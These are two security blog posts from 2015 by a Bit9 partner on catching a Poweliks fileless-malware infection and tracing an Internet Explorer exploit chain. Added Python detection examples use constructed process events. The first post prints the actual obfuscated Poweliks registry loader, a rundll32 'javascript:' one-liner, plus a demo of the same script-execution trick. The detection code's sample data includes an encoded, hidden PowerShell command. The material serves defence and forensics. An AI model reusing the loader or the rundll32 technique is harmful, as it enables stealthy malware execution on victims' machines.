The Lazy Genius

Security News & Brain Dumps from Xavier Ashe, a Bit9 Client Partner

Archive for January, 2015

Following Poweliks Strike, Custom Bit9 Rule Offers Key Insight and Blocks Infection

Posted by Xavier Ashe on January 21, 2015

I wrote this blog post for the Bit9 Blog; it was published on January 21st, 2015.


I love to hear stories about how our customers use our products. I previously wrote about a global services firm that used Bit9 to connect the dots to get to the bottom of an Internet Explorer exploit. This same company sent me the following story to show a particularly useful rule they created in Bit9:

“We wound up getting hit by a Poweliks variant pretty badly shortly after I originally emailed you, where 44 users who were in full lockdown mode had to have their computers reimaged (At that time the majority of anti-malware tools didn’t detect that malware, let alone clean it). Fortunately, we identified what was happening fairly quickly thanks to the Bit9 agent, and we were able to put a custom rule in place in Bit9 to identify users who were infected or were in the initial stage of infection. Without Bit9 installed we wouldn’t have even been able to identify who was infected, let alone prevent the payload from executing.”

Somewhere along the way, the computers that had to be reimaged acquired the following registry entry:

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18:b9e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);})) –Embedding

Once the above code executed, it would

  1. Spawn an instance of PowerShell
  2. Spawn a dllhost (or many dllhosts)
  3. Connect to up to five different Russian IP addresses, and then it would
  4. Initiate the usual malware behavior

Pretty clever!

I wouldn’t have guessed that rundll32 would be able to execute JavaScript code, but if you are curious to see for yourself, try executing the following:

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";alert('RaawwwrrrrRRrrr');

[Image: Ashe1]

Fortunately, rundll32.exe doesn’t usually launch PowerShell, so we were able to quickly identify infected users by using the following Bit9 rule:

[Image: Ashe2, the custom Bit9 rule]

The rule would then block PowerShell from executing, thereby preventing the computer from becoming completely infected. We then ran a report based on files being blocked by the rule to identify the infected users.
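The rule itself is only in the screenshot, so here is an added Python example (not the customer's or Bit9's code) that runs the same two checks over constructed process-creation events: rundll32.exe carrying a javascript:...RunHTMLApplication command line, and rundll32.exe as the parent of powershell.exe or dllhost.exe. The field names, host names, user names and PIDs are assumptions.

```python
import re

# Constructed sample process-creation events, reduced to the fields the
# checks need (roughly the shape of a Sysmon Event ID 1 record). Not real logs.
EVENTS = [
    {"host": "ws01", "user": "jdoe", "pid": 4120, "ppid": 2040,
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("...")'},
    {"host": "ws01", "user": "jdoe", "pid": 4188, "ppid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -enc AAAA"},
    {"host": "ws01", "user": "jdoe", "pid": 4200, "ppid": 4120,
     "image": r"C:\Windows\System32\dllhost.exe", "cmdline": "dllhost.exe"},
    {"host": "ws02", "user": "asmith", "pid": 3001, "ppid": 900,
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL"},   # benign rundll32 use
    {"host": "ws02", "user": "asmith", "pid": 3100, "ppid": 1500,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Date"},                    # PowerShell, but not under rundll32
]

# Stage 1: rundll32 handed a javascript: "DLL" that lands in mshtml's RunHTMLApplication.
RUNDLL_JS = re.compile(r"javascript:.*RunHTMLApplication", re.IGNORECASE)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def triage(events):
    """Return (host, user, finding, pid) tuples for stage-1 and stage-2 indicators."""
    by_pid = {(e["host"], e["pid"]): e for e in events}
    findings = []
    for e in events:
        name = basename(e["image"])
        if name == "rundll32.exe" and RUNDLL_JS.search(e["cmdline"]):
            findings.append((e["host"], e["user"], "stage1-rundll32-javascript", e["pid"]))
        # Stage 2: what the custom rule keyed on; rundll32 normally never parents these.
        parent = by_pid.get((e["host"], e["ppid"]))
        if parent and basename(parent["image"]) == "rundll32.exe" \
                and name in ("powershell.exe", "dllhost.exe"):
            findings.append((e["host"], e["user"], "stage2-rundll32-child:" + name, e["pid"]))
    return findings

def infected_users(events):
    """The report the customer ran: which (host, user) pairs tripped either check."""
    return sorted({(h, u) for h, u, _, _ in triage(events)})
```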

In the end, the exercise provided the fuel that I needed to convince management to approve an installation of a Carbon Black server for even greater visibility.


Posted in Bit9

Scan-based Forensics Solutions Are for Cavemen

Posted by Xavier Ashe on January 21, 2015

I wrote this blog post for the Bit9 Blog; it was published on January 15, 2015.


I had the opportunity to work with a global services firm that had some problems with malware on machines that were running Bit9. They were running Bit9 in “High Enforcement” mode, so the infection was being blocked, but they wanted to get to the source of the attack, since it was creating some noise in their SIEM.

At that point the customer only had a few clues. They knew there was something creating a task in c:\windows\system32\tasks that was named with a GUID (e.g., {462BD9BA-4D27-EA09-F2AC-704C4DDA8D16}).

That task would then attempt to run regsvr32.exe to register a dll file in c:\windows\system32. The dll files they encountered were named using five to six alpha characters. In one example, the ssaxxo.dll file dropped into the c:\windows\system32 directory.

The files seemed to have unique hashes, but they were all detected as known malware. When the dll file was dropped into the C:\windows\system32 directory, another file with a different name appeared in the c:\windows\syswow64 folder as well. Both dll files appeared to have been generated by rundll32.exe.

It was confirmed that their antivirus of choice did not detect this threat, while Bit9 did.

However, without more context, all they knew was that they had a vulnerability somewhere. The question was: “Where?”

At this point, the customer sent us the logs to review and collaboratively find the source of the exploit. Our Bit9 Threat Research Team jumped in, and it didn’t take long to assess the issue.

Internet Explorer was being exploited.

An IE exploit was used to drop the first dll file, create the scheduled task, and then pass the dll file to rundll32.exe. Rundll32 then created the file they discovered, and the scheduled task attempts to register it via regsvr32.exe, which is blocked by Bit9. The scheduled task is set to keep trying every 10 minutes.
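As an added example (not the customer's or Bit9's code), the chain just described expressed as a correlation over constructed file-create and process-create telemetry: a GUID-named task file under c:\windows\system32\tasks, a five-to-six-letter DLL written to system32 or syswow64 by rundll32.exe, and regsvr32.exe repeatedly invoked on it. The task GUID and ssaxxo.dll come from the case; the host names, timestamps, field names and the second DLL name are made up.

```python
import re
from collections import defaultdict

# Heuristics from the case: GUID-named task file, 5-6 alpha-character DLL in system32/syswow64.
GUID_TASK = re.compile(
    r"^c:\\windows\\system32\\tasks\\\{[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}\}$", re.I)
RANDOM_DLL = re.compile(r"^c:\\windows\\(system32|syswow64)\\[a-z]{5,6}\.dll$", re.I)

# Constructed sample telemetry, not real logs. "kdfolx.dll", hosts and times are invented.
EVENTS = [
    {"host": "ws07", "t": "09:00", "kind": "file", "image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "target": r"C:\Windows\System32\Tasks\{462BD9BA-4D27-EA09-F2AC-704C4DDA8D16}"},
    {"host": "ws07", "t": "09:00", "kind": "file", "image": r"C:\Windows\System32\rundll32.exe",
     "target": r"C:\Windows\System32\ssaxxo.dll"},
    {"host": "ws07", "t": "09:00", "kind": "file", "image": r"C:\Windows\System32\rundll32.exe",
     "target": r"C:\Windows\SysWOW64\kdfolx.dll"},
    {"host": "ws07", "t": "09:01", "kind": "proc", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s C:\Windows\System32\ssaxxo.dll", "blocked": True},
    {"host": "ws07", "t": "09:11", "kind": "proc", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s C:\Windows\System32\ssaxxo.dll", "blocked": True},  # 10-minute retry
    {"host": "ws08", "t": "09:05", "kind": "proc", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s C:\Windows\System32\msxml3.dll", "blocked": False},  # legitimate
]

def basename(p):
    return p.rsplit("\\", 1)[-1].lower()

def correlate(events):
    """Group the three indicators per host so the chain, not any single event, decides."""
    per_host = defaultdict(lambda: {"guid_task": [], "dropped_dll": [], "regsvr32": []})
    for e in events:
        h = per_host[e["host"]]
        if e["kind"] == "file":
            if GUID_TASK.match(e["target"]):
                h["guid_task"].append(e["target"])
            elif RANDOM_DLL.match(e["target"]) and basename(e["image"]) == "rundll32.exe":
                h["dropped_dll"].append(e["target"])
        elif e["kind"] == "proc" and basename(e["image"]) == "regsvr32.exe":
            m = re.search(r"\S+\.dll\b", e["cmdline"], re.I)
            if m and RANDOM_DLL.match(m.group(0)):
                h["regsvr32"].append((e["t"], m.group(0), e["blocked"]))
    return per_host

def suspected_hosts(events):
    """Hosts showing the full chain: GUID task, rundll32-dropped DLL, regsvr32 attempts on it."""
    return sorted(h for h, ind in correlate(events).items()
                  if ind["guid_task"] and ind["dropped_dll"] and ind["regsvr32"])
```

Seeing the same regsvr32 attempt blocked every 10 minutes, as in the second ws07 entries, is the scheduled task retrying, which is why the SIEM kept filling up with noise.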

As we were going through this exercise, the customer wished they also were running Carbon Black.

That’s because the customer knew from a recent demo that Carbon Black can do this type of analysis in seconds. There is no need to review log files to connect the dots; Carbon Black assembles that data for you and makes it available with just a few clicks. Plus, with Carbon Black, the customer would have known which IP address was exploiting them.

This ability to connect the dots is because the Bit9 Security Platform and Carbon Black operate in real time at the kernel layer. Products that merely perform file scans cannot deliver this level of visibility.

I think back on my days doing forensics on disk images and it seems like caveman days. It still surprises me that organizations are still buying scan-based forensic software in what is very much a real-time threat landscape.

Posted in Bit9, Carbon Black
